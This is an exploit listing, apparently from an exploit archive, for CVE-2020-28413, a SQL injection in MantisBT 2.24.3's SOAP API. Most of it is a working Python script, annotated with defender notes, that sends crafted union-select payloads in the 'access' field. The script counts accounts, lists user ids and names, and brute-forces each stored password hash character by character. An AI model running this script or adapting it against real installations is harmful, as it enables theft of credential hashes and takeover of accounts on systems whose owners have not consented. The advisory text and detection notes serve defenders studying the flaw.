
Mantis Bug Tracker 2.24.3 SQL Injection

Mantis Bug Tracker 2.24.3 SQL Injection
Posted Jan 4, 2021
Authored by EthicalHCOP

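Mantis Bug Tracker version 2.24.3 suffers from a remote SQL injection vulnerability in the 'access' parameter of the mc_project_get_users call exposed by the SOAP API (/api/soap/mantisconnect.php). Administrators of affected installations should apply the vendor fix for CVE-2020-28413 and review request logs for POSTs to that endpoint.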

tags | exploit, remote, sql injection
advisories | CVE-2020-28413
SHA-256 | 3c8957612d86d7577fdde28ee21d1df81ea67d1228ac3abae6f808678afa40ae

Mantis Bug Tracker 2.24.3 SQL Injection

# Exploit Title: Mantis Bug Tracker 2.24.3 - 'access' SQL Injection
# Date: 30/12/2020
# Exploit Author: EthicalHCOP
# Vendor Homepage: https://www.mantisbt.org/
# Version: 2.24.3
# CVE: CVE-2020-28413

import requests, sys, time
from lxml import etree

# Local intercepting-proxy settings (a debugging proxy on 127.0.0.1:8080).
# Only the commented-out request line in Hacer_Peticion refers to this dict;
# the active request does not pass it.
proxies = {
    "http": "http://127.0.0.1:8080",
    "https": "http://127.0.0.1:8080",
}

def Hacer_Peticion(query: str) -> str:
    """Post one ``mc_project_get_users`` SOAP call and return the reply as text.

    The name is Spanish for "make request". ``query`` is concatenated
    verbatim into the ``<access>`` element of the envelope, which is the
    parameter this listing's header names as injectable (CVE-2020-28413).

    Args:
        query: Text placed inside ``<access>``; the callers in this file pass
            SQL fragments.

    Returns:
        ``str()`` of the bytes produced by ``etree.tostring``, i.e. the
        ``b'...'`` repr of the re-serialised response. The callers' fixed
        slice offsets are applied to that repr.

    Defender notes:
        Every request is a POST to ``/api/soap/mantisconnect.php`` carrying a
        ``mc_project_get_users`` body whose ``<access>`` value contains SQL
        keywords (``union``, ``select``). Request-body logging or a filtering
        rule on that element can surface this traffic.
    """
    # Base URL of the MantisBT site; blank in the published listing.
    home = ""
    url = home+"/api/soap/mantisconnect.php"
    # SOAPAction is the endpoint URL followed by the literal text
    # "/mc_project_get_users", double quotes included, exactly as written.
    headers = {'content-type': 'text/xml',
               'SOAPAction': url+'"/mc_project_get_users"'}
    # Sent as the SOAP <username>/<password> elements below (blank here).
    # NOTE(review): despite the "db" in the names these are API login fields,
    # so the call presumably needs a valid MantisBT account - confirm.
    mantis_db_user = ""
    mantis_db_pass = ""
    body = """<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:man="http://futureware.biz/mantisconnect">
<soapenv:Header/>
<soapenv:Body>
<man:mc_project_get_users soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<username xsi:type="xsd:string">"""+mantis_db_user+"""</username>
<password xsi:type="xsd:string">"""+mantis_db_pass+"""</password>
<project_id xsi:type="xsd:integer">0</project_id>
<access xsi:type="xsd:string">"""+query+"""</access>
</man:mc_project_get_users>
</soapenv:Body>
</soapenv:Envelope>"""
    # verify=False turns off TLS certificate verification; no timeout is passed.
    response = requests.post(url, data=body, headers=headers, verify=False)
    # Same request routed through the module-level `proxies` dict (disabled).
    #response = requests.post(url, data=body, headers=headers, proxies=proxies, verify=False)
    # Parse and re-serialise with blank text removed, so the reply comes back
    # without inter-element whitespace.
    parser = etree.XMLParser(remove_blank_text=True)
    xml = etree.XML(response.content, parser)
    xml = etree.tostring(xml)
    # etree.tostring returns bytes here, so str() yields the b'...' repr.
    return(str(xml))

def Cantidad_Usuarios_Mantis() -> str:
    """Return the ``mantis_user_table`` row count read back through the SOAP reply.

    The name is Spanish for "Mantis user count". The ``<access>`` value sent
    is a ``union all select`` whose first column wraps ``count(*)`` between
    ``'-'`` and ``'0'``; the other columns are the constants 2, 3, 4.

    Returns:
        A one-character string cut out of the response text by fixed offsets.

    Defender notes:
        The request body names ``mantis_user_table`` inside ``<access>``;
        that table name in SOAP request bodies is a useful log search term.
    """
    query = "0 union all select concat('-',(select count(*) " \
            "from mantis_user_table),'0'),2,3,4 order by id asc limit 1"
    xml = Hacer_Peticion(query)
    # Take the text between the first "integer" marker and the next "id"
    # marker in the stringified response.
    txt = xml.split("integer")
    txt = txt[1].split("id")
    # Drop the last two characters, keep the final two of what remains, then
    # drop the last of those: exactly one character survives.
    registros = str(str(str(txt[0])[:-2])[-2:])[:-1]
    return(registros)

def Obtener_Id(usr_pos) -> str:
    """Return ``"<id>-<name>"`` for the result row at offset ``usr_pos``.

    The name is Spanish for "get id". ``usr_pos`` is stringified into the
    trailing ``limit <usr_pos>,1`` of the text sent in ``<access>``.

    Args:
        usr_pos: Zero-based row offset; ``main`` passes ``range`` integers.

    Returns:
        A single id character, a hyphen, and the text found before the first
        ``</name>`` in the response.
    """
    query = "0 union all select concat((SELECT id FROM mantis_user_table " \
            "order by id asc limit 0,1),'0'),2,3,4 limit "+str(usr_pos)+",1"
    xml = Hacer_Peticion(query)
    # Same marker-based cut as the other helpers: after the first "integer",
    # split on "id".
    txt = xml.split("integer")
    txt = txt[1].split("id")
    # Keeps only the last character of the value that precedes the first "id"
    # marker. The local name `id` shadows the builtin.
    id = str(str(txt[0])[:-2])[-1:]
    # Skip a fixed 29 characters, then read up to "</name>".
    # NOTE(review): 29 presumably spans the markup between the id and name
    # elements in the stringified reply - confirm against a real response.
    name = str(str(txt[1])[29:]).split("</name>")[0]
    return (id+"-"+name)

def brute_force(data) -> None:
    """Recover one account's stored password value a character at a time and print it.

    For positions 1..32 and each candidate in ``charts`` the function sends a
    request whose ``<access>`` text compares ``substring(binary(password))``
    at that position with the candidate. A reply whose extracted id character
    is ``"0"`` is treated as a match.

    Args:
        data: ``"<id>-<name>"`` as produced by ``Obtener_Id``; split on ``-``.

    Defender notes:
        One HTTP request is made per candidate, up to 36 x 32 per account, and
        the 10-microsecond sleep does not throttle them, so the traffic is a
        dense burst of near-identical SOAP POSTs to
        ``/api/soap/mantisconnect.php``. A 32-character value over
        ``[a-z0-9]`` is consistent with a hex digest (presumably the stored
        password hash - confirm), so password hashes on an affected
        installation should be treated as exposed and credentials rotated
        once the installation is patched.
    """
    # Candidate alphabet: lowercase letters and digits only.
    charts = "abcdefghijklmnopqrstuvwxyz0123456789"
    passw = ""
    # The local name `id` shadows the builtin.
    id = data.split("-")[0]
    name = data.split("-")[1]
    for cp in range (1,33,1):
        for c in charts:
            # Redraw the progress line in place with what has been found.
            print(f"\rHash: {passw}", end="")
            time.sleep(0.00001)
            sys.stdout.flush()
            # The IF() yields '0' when the character matches and a very large
            # number otherwise; the reply is read back below.
            query = "0 union all select (select if(substring((select binary(password) " \
                    "from mantis_user_table where id = " + str(id) + ")," + str(cp) + ",1)='" + str(c) + "','0','900000000000000000000')), 2,3,4 order by id asc limit 1"
            xml = Hacer_Peticion(query)
            txt = xml.split("integer")
            txt = txt[1].split("id")
            r_id = str(str(txt[0])[:-2])[-1:]
            if(r_id=="0"):
                passw = passw + str(c)
                break
            # If no candidate matches, nothing is appended for this position.
    # NOTE(review): the listing was flattened; these three lines are placed
    # after both loops, the reading under which the result is printed once
    # per account - confirm against the original file.
    print(f"\r", end="")
    sys.stdout.flush()
    print(name+": "+passw)

def main() -> None:
    """Print the user count, then run ``brute_force`` for each row offset.

    The printed strings are Spanish: "Cantidad usuarios en db" is "number of
    users in db" and "Obteniendo Hashes..." is "obtaining hashes...".
    """
    cantidad_users = Cantidad_Usuarios_Mantis()
    print("Cantidad usuarios en db: "+str(cantidad_users))
    print("Obteniendo Hashes...")
    # The count comes back as a string and is converted here; one
    # Obtener_Id + brute_force pass runs per offset 0..count-1.
    for x in range(0,int(cantidad_users),1):
        brute_force(Obtener_Id(x))

# Run only when executed as a script, not when imported.
if __name__ == "__main__":
    main()
